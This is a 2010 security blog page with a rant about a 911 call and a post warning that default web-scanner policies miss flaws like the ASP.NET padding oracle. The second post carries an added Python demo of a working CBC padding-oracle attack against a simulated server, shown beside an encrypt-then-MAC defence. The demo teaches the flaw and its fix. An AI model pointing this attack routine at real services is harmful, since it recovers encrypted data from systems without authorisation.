You can't secure what you don't acknowledge.℠

Wednesday, October 6, 2010

911, what's your emergency?

There's a saying: when seconds count, the police are only minutes away. Maybe yes, maybe no, and as I just experienced, sometimes they may not care at all. Let me explain...

Have you ever been driving down the road and witnessed someone driving so erratically that you think, "WOW, that person is going to cause a wreck, soon"? Well, I was out for a leisurely drive in a nearby town and was unfortunately the near-recipient of such a wreck by a gotta-have-it-now-the-world-revolves-around-me-probably-hopped-up-on-meth-idiotic driver... not once but twice! Yep, within a matter of about 4 minutes I nearly got nailed by this person TWO times.

It appeared the older lady (mid to late 60s) in a ~2005 Buick Regal, license plate number (ah, never mind), was either intoxicated OR on a suicide mission. I thought to myself, I've got to call the police and tell them about this woman... I survived her, but that doesn't mean everyone else will.

So I called 911, presumably the City of Cartersville, GA Police 911 center, since I was driving right by their headquarters building when I called. I gave them some very basic info and started to fill the operator in on some more details they probably could've used. Instead, the 911 operator I spoke with said thanks, cut me off, and went on her merry way. Yep, I heard a click... I said uh, eh, ah, oh... and there was nothing. The phone line was dead. Our government at work! I know 911 call centers have to be succinct and not tie up their... and sure, this wasn't an emergency, yet. But come on.

Keep this in mind everywhere you are - in the car, at home, and at work - for at the end of the day the police have no obligation to protect us (really); therefore we must fend for ourselves.

Monday, October 4, 2010

Beware of the oversights with default policies in Web vuln scanners

I just ran some Web vulnerability scans against an app I'm testing, using a couple of default/benign scan policies. Nothing big turned up. I re-ran the scan using a full scan policy that checks for everything, and the new MS10-070 ASP.NET padding oracle vulnerability reared its ugly head... a BIG difference in the outcome.

Keep this in mind when checking for Web security flaws with your automated scanners, and never completely rely on their results. Before you trust a clean report, find out which checks the policy you ran actually left out, and re-run with a full policy wherever the target can tolerate it. You can't live without scanners, but they're only about half of the solution.
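To make concrete what a "full" policy has to exercise that a quick default policy usually skips, here is an added example (not code from the original post, and not any scanner's own check) of the vulnerability class MS10-070 belongs to: a CBC padding oracle. A server that decrypts attacker-supplied ciphertext and answers differently when the padding is wrong lets the attacker recover the plaintext one byte at a time, with no knowledge of the key. The script simulates such a server, runs the attack against it, then runs the same attack against a hardened server that authenticates the ciphertext before decrypting. The block cipher is a toy 4-round Feistel built on HMAC-SHA256 so the script needs only the standard library; the attack does not depend on the cipher at all, which is the point. `KEY`, `IV` and `SECRET` are constructed demo values, and the function names are this example's own.

```python
import hashlib
import hmac

BLOCK = 16  # block size in bytes
# Constructed demo values (hypothetical); the attack code only ever sees IV and ciphertext.
KEY, IV, SECRET = b"server-side-key!", bytes(range(BLOCK)), b"userid=42;role=admin"

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))
def _f(key, i, half):
    # Feistel round function: keyed hash of the round index and one half block.
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, _xor(left, _f(key, i, right))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = _xor(right, _f(key, i, left)), left
    return left + right

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        out += _xor(block_decrypt(key, ciphertext[i:i + BLOCK]), prev)
        prev = ciphertext[i:i + BLOCK]
    return out

def vulnerable_server(iv, ciphertext):
    # The leak: a padding failure is distinguishable from success (think of a
    # different HTTP status code or error page). Returns True/False accordingly.
    try:
        pkcs7_unpad(cbc_decrypt(KEY, iv, ciphertext))
        return True
    except ValueError:
        return False

def hardened_server(iv, ciphertext):
    # Encrypt-then-MAC: forged input is rejected before any decryption, so the
    # padding check never runs on attacker-controlled bytes.
    tag, body = ciphertext[:32], ciphertext[32:]
    if not hmac.compare_digest(tag, hmac.new(KEY, iv + body, hashlib.sha256).digest()):
        return False  # one uniform answer for every forgery
    pkcs7_unpad(cbc_decrypt(KEY, iv, body))
    return True

def padding_oracle_attack(oracle, iv, ciphertext):
    # Recover plaintext from yes/no answers alone, learning D_key(block) byte by
    # byte by forging the preceding block; returns None if the oracle never says yes.
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plaintext = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)
        for pos in range(BLOCK - 1, -1, -1):
            padval = BLOCK - pos
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ padval  # known bytes forced to decrypt to padval
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged), target):
                    continue
                if pos == BLOCK - 1:  # rule out an accidental \x02\x02-style match
                    forged[pos - 1] ^= 1
                    if not oracle(bytes(forged), target):
                        continue
                inter[pos] = guess ^ padval
                break
            else:
                return None
        plaintext += _xor(inter, prev)
    return pkcs7_unpad(plaintext)

def demo():
    body = cbc_encrypt(KEY, IV, pkcs7_pad(SECRET))
    tag = hmac.new(KEY, IV + body, hashlib.sha256).digest()
    return (padding_oracle_attack(vulnerable_server, IV, body),
            padding_oracle_attack(hardened_server, IV, tag + body))
```

`demo()` returns the fully recovered `SECRET` from the vulnerable server and `None` from the hardened one. Note the cost: up to 256 requests per byte, plus a second request to disambiguate the last byte of each block, which is the kind of slow, noisy probing a scanner's quick default policy is likely to leave out, and exactly what you lose when you never run the full policy.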